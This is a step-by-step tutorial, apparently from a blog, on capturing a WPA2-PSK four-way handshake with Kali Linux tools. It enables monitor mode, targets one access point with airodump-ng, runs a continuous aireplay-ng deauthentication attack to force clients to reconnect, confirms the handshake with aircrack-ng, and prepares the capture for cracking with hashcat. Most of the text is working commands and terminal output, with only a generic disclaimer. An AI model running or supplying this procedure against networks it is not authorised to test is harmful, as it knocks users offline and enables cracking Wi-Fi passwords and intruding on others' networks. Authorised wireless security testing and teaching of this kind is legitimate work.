How To Capturing WPA2-PSK Handshake Kali Linux 2018.4

image_pdfimage_print

In this lab i will show how to capture the WPA2 4 way handshake using Kali Linux and using hashcat to crack the captured file.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Enable Monitor Mode On a Supported WiFi Card

1.1.a Display wireless card

sudo iwconfig
root@GalaxyS9:~#sudo iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

root@GalaxyS9:~# 

1.2 Enable monitoring mode

sudo airmon-ng start wlan0
root@GalaxyS9:~#sudo airmon-ng start wlan0

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

   PID Name
   612 NetworkManager
   691 dhclient
  1403 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		rt2800usb	Ralink Technology, Corp. RT5572

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

root@GalaxyS9:~# 

1.3 Display the new created virtual interface called wlan0mon

sudo iwconfig
root@GalaxyS9:~# sudo iwconfig
lo        no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
eth0      no wireless extensions.

root@GalaxyS9:~# 

Step  2: Use Airodump To Capture Packets

2.1.a Start sniffing nearby trafic

sudo airodump-ng wlan0mon

Use the command below to sniff nearby trafic and save the captured packets in to a file

sudo airodump-ng wlan0mon --write my_file

2.1.b Let it run a while and close the capture, the file will contain the bssid address and the channel

Step 3: Capture The WPA2-PSK Handshake

3.1 Use airodump-ng to record the traffic from a specific access point, copy the BSSID and the channel number from the file that we created in the last step

sudo airodump-ng wlan0mon --bssid F0:9F:C0:AA:6C:B8 -c 6 --write test01

3.2.a Open a new terminal window and launch a deauth attack with aireplay-ng

sudo aireplay-ng --deauth 0 -a F0:9F:C0:AA:6C:B8 wlan0mon

3.2.b Go back to terminal 1, stop the capture when you capture the wpa handshake

 CH  6 ][ Elapsed: 2 mins ][ 2018-12-06 20:26 ][ WPA handshake: F0:9F:C0:AA:6C:B8                                  
                                                                                                                   
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                   
 F0:9F:C0:AA:6C:B8  -59  40      899      174    0   6  195  WPA2 CCMP   PSK  hemam                               
                                                                                                                   
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         
                                                                                                                   
 F0:9F:C0:AA:6C:B8  F4:BF:80:C7:EC:56  -31    1e- 1e     0       70  hemam                                         

^Croot@GalaxyS9:~# 

3.2.c Stop the deauth attack in terminal 2

3.3.a Confirm the captured handshake with aircrack-ng

sudo aircrack-ng test01.cap
root@GalaxyS9:~# sudo aircrack-ng test01.cap
Opening test01.capse wait...
Read 87180 packets.

   #  BSSID              ESSID                     Encryption

   1  F0:9F:C0:AA:6C:B8  hemam                    WPA (1 handshake)

Choosing first network as target.

Opening test01.capse wait...
Read 87180 packets.

1 potential targets

Please specify a dictionary (option -w).


Quitting aircrack-ng...
root@GalaxyS9:~#  

Step 4: Convert The Captured Cap File

4.1 The captured .cap file needs to be to hccapx format to be cracked, the hashcat team have created a site where you can upload and convert a WPA / WPA2 pcap capture file to a hashcat capture file.

Open https://hashcat.net/cap2hccapx/ and upload the file.

Please fallow the guide on how to crack the formatted file using hashcat in windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

image_pdfimage_print

Donate